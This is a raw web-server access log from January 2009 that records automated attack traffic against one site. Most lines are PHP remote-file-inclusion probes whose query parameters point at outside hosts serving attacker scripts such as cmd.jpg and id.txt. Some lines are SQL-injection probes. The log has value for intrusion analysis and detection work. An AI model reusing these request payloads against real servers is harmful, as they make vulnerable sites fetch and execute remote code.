79.132.211.3 - - [30/Jan/2009:09:11:12 -0800] "GET /apboard/thread.php/add.php?APB_rp=http://www.uarel.co.uk/webalizer/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:09:11:12 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:09:11:22 -0800] "GET /logs/access_080322.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:09:11:22 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:09:11:23 -0800] "GET /logs/access_080314.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:09:11:25 -0800] "GET /logs/access_080722.log/%030/errors.php?error=http://www.articlecollections.co.cc/admin/backup/V8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:09:11:26 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 200 95069 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:09:12:02 -0800] "GET //vwar/backup/errors.php?error=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:09:12:02 -0800] "GET /logs/access_081227.log%20///vwar/backup/errors.php?error=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:09:12:03 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:09:12:05 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:09:12:08 -0800] "GET /logs/access_080322.log%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:09:12:08 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:09:12:09 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 200 95069 "-" "libwww-perl/5.79" "www.dmulk.com"
79.132.211.3 - - [30/Jan/2009:09:12:09 -0800] "GET /apboard/thread.php?APB_rp=http://www.uarel.co.uk/webalizer/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:09:12:21 -0800] "GET /logs/access_080320.log%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:09:13:38 -0800] "GET /bikes/dteel/2008_07_05/?N=A HTTP/1.0" 200 992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.230.142.4 - - [30/Jan/2009:09:13:56 -0800] "GET /logs/access_080826.log/area.php?id=' HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
203.230.142.4 - - [30/Jan/2009:09:13:56 -0800] "GET /logs/area.php?id=' HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
203.230.142.4 - - [30/Jan/2009:09:13:56 -0800] "GET /area.php?id=' HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
203.230.142.4 - - [30/Jan/2009:09:14:01 -0800] "GET /logs/access_080904.log/area.php?id=' HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:09:14:55 -0800] "GET /logs/access_080827.log///vwar/backup/errors.php?error=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
79.98.48.132 - - [30/Jan/2009:09:15:00 -0800] "GET /logs/access_081223.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/bjorkid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:09:15:10 -0800] "GET /logs/access_080805.log///vwar/backup/errors.php?error=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:09:15:18 -0800] "GET /?_zb_path=http://allnet3.fileave.com/cmd.txt? HTTP/1.1" 200 94644 "-" "libwww-perl/5.79" "www.dmulk.com"
202.67.13.250 - - [30/Jan/2009:09:15:38 -0800] "GET /logs/access_080320.log%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mhasbi.com/ra.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
202.67.13.250 - - [30/Jan/2009:09:15:38 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mhasbi.com/ra.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
202.67.13.250 - - [30/Jan/2009:09:15:38 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mhasbi.com/ra.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:09:15:44 -0800] "GET /logs/access_080322.log%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:09:15:44 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:09:15:45 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 200 95069 "-" "libwww-perl/5.811" "www.dmulk.com"
203.230.142.4 - - [30/Jan/2009:09:15:58 -0800] "GET /logs/access_080826.log/area.php?id=' HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
203.230.142.4 - - [30/Jan/2009:09:15:58 -0800] "GET /area.php?id=' HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
203.230.142.4 - - [30/Jan/2009:09:15:58 -0800] "GET /logs/area.php?id=' HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
203.230.142.4 - - [30/Jan/2009:09:16:02 -0800] "GET /logs/access_080904.log/area.php?id=' HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
202.58.65.23 - - [30/Jan/2009:09:16:36 -0800] "GET /logs/access_080717.log//?path%5Bdocroot%5D=http://h1.ripway.com/sev3nfold/idomila.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.135.71.20 - - [30/Jan/2009:09:16:48 -0800] "GET /logs/access_081220.log//errors.php?error=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [30/Jan/2009:09:16:52 -0800] "GET /logs/access_081220.log//errors.php?error=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [30/Jan/2009:09:17:14 -0800] "GET /logs/access_081223.log//errors.php?error=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [30/Jan/2009:09:17:22 -0800] "GET /logs/access_081223.log//errors.php?error=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.230.89.98 - - [30/Jan/2009:09:17:33 -0800] "GET /logs/access_080728.log//skin/zero_vote/error.php?dir=http://geocities.com/kombinasi2000/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.230.89.98 - - [30/Jan/2009:09:17:33 -0800] "GET /skin/zero_vote/error.php?dir=http://geocities.com/kombinasi2000/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.230.89.98 - - [30/Jan/2009:09:17:33 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://geocities.com/kombinasi2000/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.230.89.98 - - [30/Jan/2009:09:17:33 -0800] "GET /logs/access_080328.log//skin/zero_vote/error.php?dir=http://geocities.com/kombinasi2000/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:09:18:24 -0800] "GET /logs/access_081227.log%20///vwar/backup/errors.php?error=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:09:18:43 -0800] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:09:18:43 -0800] "GET /logs/access_080322.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:09:18:47 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:09:18:55 -0800] "GET /logs/access_081227.log/frame.php?page=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:09:18:55 -0800] "GET /frame.php?page=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:09:18:55 -0800] "GET /logs/frame.php?page=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:09:19:34 -0800] "GET /logs/access_080504.log//admin/classes/TplLoad.php?full_path_to_public_program=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:09:19:34 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:09:19:34 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:09:19:35 -0800] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:09:19:35 -0800] "GET /logs/access_080322.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
121.126.12.7 - - [30/Jan/2009:09:19:48 -0800] "GET /skin/zero_vote/error.php?dir=http://geocities.com/kombinasi2000/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.126.12.7 - - [30/Jan/2009:09:19:48 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://geocities.com/kombinasi2000/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:09:19:50 -0800] "GET /logs/access_080314.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.230.142.4 - - [30/Jan/2009:09:19:55 -0800] "GET /logs/area.php?id=' HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
203.230.142.4 - - [30/Jan/2009:09:19:55 -0800] "GET /logs/access_080826.log/area.php?id=' HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
203.230.142.4 - - [30/Jan/2009:09:19:55 -0800] "GET /area.php?id=' HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
203.230.142.4 - - [30/Jan/2009:09:20:00 -0800] "GET /logs/access_080904.log/area.php?id=' HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
217.168.153.73 - - [30/Jan/2009:09:20:36 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/jokolimo/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.168.153.73 - - [30/Jan/2009:09:20:36 -0800] "GET /logs/access_080510.log//templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/jokolimo/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.168.153.73 - - [30/Jan/2009:09:20:42 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/jokolimo/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.168.153.73 - - [30/Jan/2009:09:20:42 -0800] "GET /logs/access_080407.log//templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/jokolimo/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.168.153.73 - - [30/Jan/2009:09:21:12 -0800] "GET /logs/access_080113.log//templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/jokolimo/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
121.126.12.7 - - [30/Jan/2009:09:22:11 -0800] "GET /logs/access_081017.log//skin/zero_vote/error.php?dir=http://geocities.com/kombinasi2000/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.126.12.7 - - [30/Jan/2009:09:22:16 -0800] "GET /logs/access_080328.log//skin/zero_vote/error.php?dir=http://geocities.com/kombinasi2000/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:09:23:23 -0800] "GET /logs/access_081223.log%20//admin/classes/TplLoad.php?full_path_to_public_program=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:09:23:23 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:09:23:23 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:09:24:33 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://eskipazartarim.gov.tr/uploads/main.js??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:09:24:33 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://eskipazartarim.gov.tr/uploads/main.js??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:09:24:33 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://eskipazartarim.gov.tr/uploads/main.js??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.31.16.164 - - [30/Jan/2009:09:24:34 -0800] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://www.inec.ie//assets/images/Albid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.31.16.164 - - [30/Jan/2009:09:24:47 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.inec.ie//assets/images/Albid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:09:25:26 -0800] "GET /logs/access_080504.log//admin/classes/TplLoad.php?full_path_to_public_program=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:09:25:27 -0800] "GET /logs/access_080712.log/index.php?themesdir=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:09:25:27 -0800] "GET /logs/index.php?themesdir=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:09:25:31 -0800] "GET /index.php?themesdir=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 200 65555 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:09:25:36 -0800] "GET /logs/access_081223.log%20//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:09:25:36 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:09:25:38 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://eskipazartarim.gov.tr/uploads/main.js??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:09:25:38 -0800] "GET /logs/access_080320.log%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://eskipazartarim.gov.tr/uploads/main.js??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:09:25:38 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://eskipazartarim.gov.tr/uploads/main.js??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:09:25:39 -0800] "GET /logs/access_080209.log/index.php?themesdir=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:09:25:41 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:09:25:51 -0800] "GET /logs/access_081016.log//admin/classes/TplLoad.php?full_path_to_public_program=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:09:26:05 -0800] "GET /logs/access_081223.log%20//admin/classes/TplLoad.php?full_path_to_public_program=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.31.16.164 - - [30/Jan/2009:09:26:17 -0800] "GET /logs/access_080622.log//include/bbs.lib.inc.php?site_path=http://www.inec.ie//assets/images/Albid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
148.245.102.115 - - [30/Jan/2009:09:26:34 -0800] "GET /include/write.php?dir=http://www.djrogerm.com/assets/flash/win.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [30/Jan/2009:09:26:34 -0800] "GET /logs//include/write.php?dir=http://www.djrogerm.com/assets/flash/win.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [30/Jan/2009:09:26:34 -0800] "GET /logs/access_080401.log//include/write.php?dir=http://www.djrogerm.com/assets/flash/win.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:09:26:52 -0800] "GET /logs/access_080504.log//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:09:26:53 -0800] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:27:42 -0800] "GET /logs/access_080322.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:27:43 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95134 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:27:44 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:28:02 -0800] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:28:03 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95209 "-" "libwww-perl/5.813" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:28:03 -0800] "GET /logs/access_080322.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:28:03 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:28:05 -0800] "GET /logs/access_080314.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:28:05 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95102 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:28:07 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:28:17 -0800] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:28:18 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95209 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:28:19 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:28:28 -0800] "GET /logs/access_080824.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:28:29 -0800] "GET /logs/access_080314.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:28:29 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95134 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:28:29 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
